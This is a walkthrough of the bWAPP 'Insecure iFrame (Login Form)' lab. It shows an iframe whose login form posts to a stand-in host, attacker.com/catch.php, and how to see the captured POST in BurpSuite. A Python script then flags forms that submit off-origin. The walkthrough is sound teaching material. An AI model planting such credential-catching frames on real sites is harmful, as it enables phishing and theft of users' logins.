bWAPP Insecure iFrame Login Form
Insecure iFrame (Login Form) - Low Security Level

Solution:

Step 1. Right-click on the lesson page and select View Page Source.

Note: As angled brackets aren't allowed in the YouTube description, they are replaced with ( ); kindly make the necessary change.

Step 2. Locate the (iframe src="http://10.0.2.15/evil/sandbox.htm" height="500" width="500")(iframe)

Step 3. Click on the URL http://10.0.2.15/evil/sandbox.htm and a new page will pop up. Right-click and select View Page Source.

Step 4. Note the form action (you can also get the same result by right-clicking on the lesson page and selecting View Frame Source):
(form action="http://attacker.com/catch.php?" method="POST")
Visit the URL http://attacker.com/catch.php

Step 5. Go back to the lesson page, click on the Login button and check the results. Reload the lesson page.

*Note: I am using the BurpSuite pre-configured browser; if you are not using the pre-configured browser, please configure the browser with the proxy and then follow the steps below.

Step 6. When you click on the Login button and pass the lesson page through BurpSuite, you will find the details below:
POST /catch.php? HTTP/1.1
Host: attacker.com

PseudoTime
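As an added example (not part of the original video description), the manual inspection in steps 1 to 4 can be written as a defender-side check that follows nested iframes and reports any form that submits to a different origin than the page hosting it. The lesson page URL and the input field names in the sample markup are constructed placeholders; the frame URL and form action are the ones quoted in the steps.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

class FrameFormParser(HTMLParser):
    """Collect iframe sources and form targets, resolved against the page URL."""
    def __init__(self, base_url):
        super().__init__()
        self.base_url, self.frames, self.forms = base_url, [], []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe" and a.get("src"):
            self.frames.append(urljoin(self.base_url, a["src"]))
        elif tag == "form":
            # A missing or empty action submits back to the page itself.
            target = urljoin(self.base_url, a.get("action") or "")
            self.forms.append(((a.get("method") or "GET").upper(), target))

def origin(url):
    """Scheme, host and port: the tuple the same-origin comparison uses."""
    parts = urlsplit(url)
    return parts.scheme, parts.hostname, parts.port

def audit(start_url, pages):
    """Walk a page and its nested frames; return forms that post off-origin.

    `pages` maps URL -> HTML so the check runs offline on saved sources.
    """
    findings, queue, seen = [], [start_url], set()
    while queue:
        url = queue.pop(0)
        if url in seen or url not in pages:
            continue
        seen.add(url)
        parser = FrameFormParser(url)
        parser.feed(pages[url])
        queue.extend(parser.frames)
        for method, target in parser.forms:
            if origin(target) != origin(url):
                findings.append((url, method, urlsplit(target).hostname))
    return findings

# Constructed sample: LESSON and the input names are placeholders.
LESSON = "http://10.0.2.15/lesson-page"
FRAME = "http://10.0.2.15/evil/sandbox.htm"
PAGES = {
    LESSON: '<iframe src="%s" height="500" width="500"></iframe>' % FRAME,
    FRAME: '<form action="http://attacker.com/catch.php?" method="POST">'
           '<input name="login"><input name="password" type="password"></form>',
}
```

Calling `audit(LESSON, PAGES)` reports the framed page as the one whose login form leaves the site, which is the same observation step 6 confirms in the proxy.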